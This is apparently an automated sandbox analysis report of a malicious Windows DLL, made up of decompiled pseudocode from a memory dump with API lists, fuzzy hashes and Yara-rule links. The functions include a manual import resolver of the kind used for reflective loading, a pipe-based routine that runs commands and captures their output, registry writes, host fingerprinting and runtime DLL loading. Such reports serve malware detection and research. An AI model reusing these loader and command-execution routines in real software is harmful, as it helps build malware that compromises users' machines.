									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC2A(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x2ff04a0
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E249(_t183);
										}
										E100052A8( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x2ff04a0
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085BB( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x2ff06c8
									_t153 = _t51;
									L25:
									_t90 = E10005527(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x2ff04a0
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C29D(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x306f878
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x306f878
								 *((intOrPtr*)(_t109 + 0x30))();
								E10008600( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E10008600( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E291(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095C7(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFF7(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085BB( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x10004a0c
0x10004a19
0x10004a24
0x10004a29
0x10004a2b
0x10004a2e
0x10004a33
0x10004a36
0x10004a40
0x10004a42
0x10004a4f
0x10004a58
0x10004a58
0x10004a65
0x10004a80
0x10004a87
0x10004a89
0x10004a8e
0x10004a93
0x10004a99
0x10004aa8
0x10004ac7
0x10004ac9
0x10004acf
0x10004ad5
0x10004ada
0x10004ade
0x10004ae1
0x10004aeb
0x10004aed
0x10004aee
0x10004af9
0x10004afb
0x10004afe
0x10004b03
0x10004b0a
0x10004b5f
0x10004b5f
0x10004b64
0x10004bcb
0x10004bd0
0x10004bd2
0x10004bdc
0x10004be1
0x10004be1
0x10004bfb
0x10004bfd
0x10004c00
0x10004c02
0x00000000
0x00000000
0x10004c08
0x10004c12
0x10004c1b
0x10004c20
0x10004c23
0x10004c29
0x10004c2f
0x10004c37
0x10004c39
0x10004c3c
0x10004c3d
0x10004c42
0x10004c45
0x10004c48
0x10004c4a
0x10004c4e
0x10004c4e
0x10004c53
0x10004c56
0x10004c58
0x10004c5c
0x10004c5c
0x10004c63
0x10004c68
0x10004c6a
0x10004c6e
0x10004c70
0x10004c76
0x10004c7a
0x10004c7d
0x10004c7e
0x10004c83
0x10004c86
0x10004c8b
0x10004cb3
0x10004cb9
0x10004cc0
0x10004ccf
0x10004cd4
0x00000000
0x10004cd4
0x10004cc2
0x00000000
0x10004c8d
0x10004c8d
0x10004c92
0x10004c99
0x10004cde
0x10004cde
0x10004ce5
0x10004ce9
0x10004cea
0x10004cea
0x10004cf4
0x10004cf9
0x10004cfc
0x10004cfd
0x10004cff
0x10004d01
0x10004d06
0x10004d0d
0x10004d50
0x10004d0f
0x10004d14
0x10004d1c
0x10004d20
0x10004d2b
0x10004d36
0x10004d3e
0x10004d42
0x10004d4a
0x10004d4a
0x10004d0d
0x10004d56
0x10004d59
0x10004d5b
0x10004d61
0x10004d61
0x10004d63
0x10004d63
0x00000000
0x10004d63
0x10004c9b
0x10004c9b
0x10004ca1
0x10004ca3
0x10004ca8
0x10004ca8
0x10004caa
0x10004cd9
0x00000000
0x10004cd9
0x10004cac
0x10004ae5
0x10004ae5
0x00000000
0x10004ae5
0x10004c8b
0x10004b6a
0x10004b78
0x10004b8b
0x10004b90
0x10004b96
0x10004b98
0x10004bb0
0x10004bb5
0x10004bbe
0x10004bc4
0x00000000
0x10004bc4
0x10004ba0
0x10004ba9
0x00000000
0x10004ba9
0x10004b0c
0x10004b12
0x10004b14
0x10004b52
0x10004b54
0x00000000
0x00000000
0x10004b56
0x10004b5a
0x00000000
0x10004b5a
0x10004b16
0x10004b20
0x10004b2c
0x10004b37
0x10004b3e
0x10004b48
0x10004b4d
0x00000000
0x10004b4d
0x10004ae3
0x00000000
0x10004a67
0x10004a72
0x10004a78
0x10004a7a
0x10004d65
0x10004d65
0x10004d67
0x10004d6d
0x10004d6d
0x00000000
0x10004a7a

APIs

memset.MSVCRT ref: 10004A2E
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D20
lstrcatW.KERNEL32(00000000,?), ref: 10004D3E
lstrcatW.KERNEL32(00000000,00000000), ref: 10004D42
lstrcatW.KERNEL32(00000000,1001B994), ref: 10004D4A
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D50

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 62969c4e8768608e47be4c88e0413589d716b6224435312465d12a19acd94c00
Instruction ID: 7ccac8b502451e5b7a742acc225b8edaafd8b9eb524e624c54795ddda11a0b18
Opcode Fuzzy Hash: 62969c4e8768608e47be4c88e0413589d716b6224435312465d12a19acd94c00
Instruction Fuzzy Hash: 3391ADB5604301ABF304DB20DC86F6E73E9EB84390F124A2DF5559B299EF70ED448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D753, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D767
SysAllocString.OLEAUT32(?), ref: 1000D76F
SysAllocString.OLEAUT32(00000000), ref: 1000D783
SysFreeString.OLEAUT32(?), ref: 1000D7FE
SysFreeString.OLEAUT32(?), ref: 1000D801
SysFreeString.OLEAUT32(?), ref: 1000D806

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 533f58d5d8afb924d606c824253e1b92029f16f14e0bed1b48c045e6ad26739a
Instruction ID: 8cf6b93e2451088eb1bb9766ed2507027e49de2e01c3db39ed6556aff2126d07
Opcode Fuzzy Hash: 533f58d5d8afb924d606c824253e1b92029f16f14e0bed1b48c045e6ad26739a
Instruction Fuzzy Hash: A521FB75900219BFDB00DFA5CC88DAFBBBDEF48294B1044AAF505A7250DB70AE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10010802, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 1001095B
@, xrefs: 10010870
\u%04X, xrefs: 1001091C

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: feb80d3a04cc4fc4cf5808f9b25bd72cd22dbc47354be86eb52a922d1ecc23a5
Instruction ID: 5834604bd64903192ee08d211dc49906cb49224659e5567271de8e71af9a3c4a
Opcode Fuzzy Hash: feb80d3a04cc4fc4cf5808f9b25bd72cd22dbc47354be86eb52a922d1ecc23a5
Instruction Fuzzy Hash: FB413B72B04249ABEB14CDA88CA5BAE36A8DF01294F104116FDC2DE346DAF1CED183D1

Uniqueness

Uniqueness Score: -1.00%

Function 1001220A, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1001220A(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122D8();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L1001229C();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018248;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L1001229C();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018250;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x1001220a
0x10012212
0x10012217
0x1001221a
0x1001221f
0x10012225
0x1001222e
0x10012232
0x10012232
0x1001222e
0x10012234
0x10012239
0x10012242
0x10012247
0x1001224a
0x10012253
0x10012255
0x1001225c
0x1001226d
0x1001226d
0x1001226f
0x10012277
0x1001227e
0x00000000
0x10012279
0x1001227d
0x1001227d
0x1001225e
0x1001225e
0x10012264
0x10012266
0x1001226b
0x10012281
0x10012284
0x10012289
0x00000000
0x00000000
0x00000000
0x1001226b

APIs

localeconv.MSVCRT ref: 10012212
strchr.MSVCRT ref: 10012225
_errno.MSVCRT ref: 10012234
strtod.MSVCRT ref: 10012242
_errno.MSVCRT ref: 1001226F

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: bc4233f11c00668a7001d9a98d59c6705406a7d7ae7faa33f9dc9bcaca41ff71
Instruction ID: bc1e6689561b9e656043b1385d2f50dc6362d0c3bb2d0ffc00f4b959df95ecfa
Opcode Fuzzy Hash: bc4233f11c00668a7001d9a98d59c6705406a7d7ae7faa33f9dc9bcaca41ff71
Instruction Fuzzy Hash: 4801D8B9900145BADB12DF64D90169D7BA4EF4B364F2141D0E9806F1E1CB74D5F5C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF8F, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF8F(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x2ff04a0
				GetCurrentProcess();
				_t11 = E1000B9EB();
				_t1 = _t29 + 0x1644; // 0x2ff1ae4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FA4(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x2ff06c8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FA4(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3C1(_t3);
				_t7 = _t29 + 0x220; // 0x2ff06c0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3FC(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x1000cf92
0x1000cf94
0x1000cf9b
0x1000cfa3
0x1000cfad
0x1000cfad
0x1000cfb3
0x1000cfbc
0x1000cfc2
0x1000cfc4
0x1000cfc8
0x1000cfc8
0x1000cfcd
0x1000cfd3
0x1000cfe3
0x1000cfed
0x1000cff5
0x1000cff8
0x1000d004
0x1000d00a
0x1000d00f
0x1000d015
0x1000d01b
0x1000d021
0x1000d029

APIs

GetCurrentProcess.KERNEL32(?,?,02FF04A0,?,1000353A), ref: 1000CF9B
GetModuleFileNameW.KERNEL32(00000000,02FF1AE4,00000105,?,?,02FF04A0,?,1000353A), ref: 1000CFBC
memset.MSVCRT ref: 1000CFED
GetVersionExA.KERNEL32(02FF04A0,02FF04A0,?,1000353A), ref: 1000CFF8
GetCurrentProcessId.KERNEL32(?,1000353A), ref: 1000CFFE

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: 96b6ec85a81724162f27d91dfa04e4579c29a66ef21a4bceb47efb7bfb55a1a4
Instruction ID: b585eaf47835b1e69fe94979de649fd9c2e4cab01659644ccb5f3879e9bd62b3
Opcode Fuzzy Hash: 96b6ec85a81724162f27d91dfa04e4579c29a66ef21a4bceb47efb7bfb55a1a4
Instruction Fuzzy Hash: DC019E749017149BE760DF308C8ABEABBE5EF94350F00082DF59693251EB70B705CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1000A99D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A99D(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E10008600( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x306f878
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x306f878
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E100085EA(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x306f878
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x306f878
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x306f878
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x306f878
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E1000918C(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009278(_t127);
						E10008600( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C384(_t127));
				_t98 =  *0x1001e68c; // 0x306fa40
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x306f878
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x306f878
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E1000923C(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E10008600( &_v32, 0);
				return _t128;
			}

0x1000a9a8
0x1000a9aa
0x1000a9b6
0x1000a9bb
0x1000a9be
0x1000a9c0
0x1000a9c3
0x1000a9c6
0x1000a9cd
0x1000a9d0
0x1000a9d7
0x1000a9da
0x1000a9e4
0x1000a9e5
0x1000a9e8
0x1000a9ea
0x1000a9eb
0x1000aa02
0x1000ab82
0x00000000
0x1000ab82
0x1000aa19
0x1000ab4e
0x1000ab54
0x1000ab5f
0x1000ab61
0x1000ab69
0x1000ab69
0x1000ab70
0x1000ab72
0x1000ab7b
0x1000ab7b
0x00000000
0x1000ab7e
0x1000aa1f
0x1000aa22
0x1000aa25
0x1000aa2b
0x1000aa35
0x1000aa3f
0x1000aa46
0x1000aa4f
0x1000aa51
0x1000aa57
0x00000000
0x00000000
0x1000aa62
0x1000aa69
0x1000aa6a
0x1000aa6f
0x1000aa70
0x1000aa71
0x1000aa76
0x1000aa78
0x1000aa79
0x1000aa7a
0x1000aa7d
0x1000aa83
0x00000000
0x00000000
0x1000aa89
0x1000aa91
0x1000aa94
0x1000aa9c
0x1000aa9f
0x1000aaa2
0x1000aaa8
0x1000aabc
0x1000aac2
0x1000aac8
0x1000aaf1
0x1000aaca
0x1000aaca
0x1000aacc
0x1000aace
0x1000aad6
0x1000aade
0x1000aae3
0x1000aae3
0x1000aaf7
0x1000aaf9
0x1000aaf9
0x1000ab01
0x1000ab09
0x1000ab0a
0x1000ab0f
0x1000ab18
0x1000ab38
0x1000ab38
0x1000ab40
0x1000ab43
0x1000ab4b
0x00000000
0x1000ab4b
0x1000ab21
0x1000ab25
0x00000000
0x00000000
0x1000ab2d
0x00000000

APIs

memset.MSVCRT ref: 1000A9DA
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000A9FE
CreatePipe.KERNEL32(1000658F,?,0000000C,00000000), ref: 1000AA15

Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646

Strings

D, xrefs: 1000AA35

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: eb987a04adcae8d8c5b90a31cbc9f8d815262693b6639f398634e887f722e0f0
Instruction ID: 746ba47fdd6cc5b050f282edc2f958d2642d0c94e781aeb0ddd390b9b3935c5a
Opcode Fuzzy Hash: eb987a04adcae8d8c5b90a31cbc9f8d815262693b6639f398634e887f722e0f0
Instruction Fuzzy Hash: 59511672900219AFEB41CFA8CC85FDEBBB9FB08380F514169F500E7255DB74AA458B65

Uniqueness

Uniqueness Score: -1.00%

Function 100124A6, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E100124A6(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E0A4(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x100124ac
0x100124b4
0x100124c9
0x100124db
0x100124e7
0x100124ed
0x100124f2
0x100124fe
0x10012669
0x00000000
0x10012669
0x10012504
0x1001250d
0x1001251b
0x1001251e
0x1001252d
0x1001252d
0x10012534
0x10012542
0x10012545
0x10012562
0x10012569
0x10012579
0x10012591
0x1001257b
0x10012583
0x10012583
0x10012594
0x10012598
0x100125a4
0x100125a8
0x100125ac
0x100125b0
0x100125bc
0x100125e7
0x100125ef
0x10012601
0x1001260d
0x100125be
0x100125c3
0x100125ce
0x100125da
0x100125da
0x10012616
0x1001261c
0x10012626
0x10012642
0x10012628
0x10012637
0x10012637
0x10012626
0x1001264a
0x10012653
0x10012653
0x10012661
0x00000000
0x10012661
0x1001256d
0x00000000
0x1001256d
0x00000000
0x10012545
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124C3
LoadLibraryA.KERNEL32(00000000), ref: 1001255C

Strings

GetProcAddress, xrefs: 100124CC
kernel32.dll, xrefs: 100124BE

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: bb4e68213c562c1fa801193cd89b89bf52a2a92629122bc31f0ff2ef10cdd317
Instruction ID: 07b277518937ab197daabd61ad14ff0b0aa7506dcab8f797d25a3703402acd83
Opcode Fuzzy Hash: bb4e68213c562c1fa801193cd89b89bf52a2a92629122bc31f0ff2ef10cdd317
Instruction Fuzzy Hash: 73617CB5D00209EFDB40CF98C985BADBBF1FF08355F208599E815AB2A1D374AA90DF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4D9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4D9(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x2ff04a0
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095C7(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x2ff04a0
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009626( &_v140, 0x40, L"%08x", E1000D40B(_t66 + 0xb0, E1000C384(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x2ff04a0
					asm("sbb eax, eax");
					_t25 = E100095C7(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x2ff04a0
					_t68 = E100092CB(_t26 + 0x1020);
					_v12 = _t68;
					E100085BB( &_v8);
					_t32 =  *0x1001e688; // 0x2ff04a0
					_t34 = E100092CB(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x306f878
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E17C(0x1001bb40, _t60);
					}
					 *0x1001e780 = _t38;
					E10008600( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E10008600(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x306f9a0
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x1000c4d9
0x1000c4d9
0x1000c4d9
0x1000c4dc
0x1000c4e8
0x1000c4f3
0x1000c50f
0x1000c514
0x1000c51d
0x1000c51f
0x1000c527
0x1000c548
0x1000c54d
0x1000c55a
0x1000c565
0x1000c56c
0x1000c573
0x1000c584
0x1000c58a
0x1000c58d
0x1000c5a4
0x1000c5b0
0x1000c5b8
0x1000c5bf
0x1000c5c5
0x1000c5d1
0x1000c5d7
0x1000c5de
0x1000c5f1
0x1000c5e0
0x1000c5e0
0x1000c5e3
0x1000c5e9
0x1000c5ee
0x1000c5f3
0x1000c5fe
0x1000c610
0x1000c622
0x00000000
0x1000c624
0x1000c62b
0x00000000
0x1000c631
0x1000c632
0x1000c632
0x1000c639
0x1000c63b
0x1000c640
0x1000c640
0x1000c645
0x1000c649
0x1000c649

APIs

LoadLibraryW.KERNEL32 ref: 1000C5D1
memset.MSVCRT ref: 1000C610

Strings

dll, xrefs: 1000C593
%08x, xrefs: 1000C53A

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
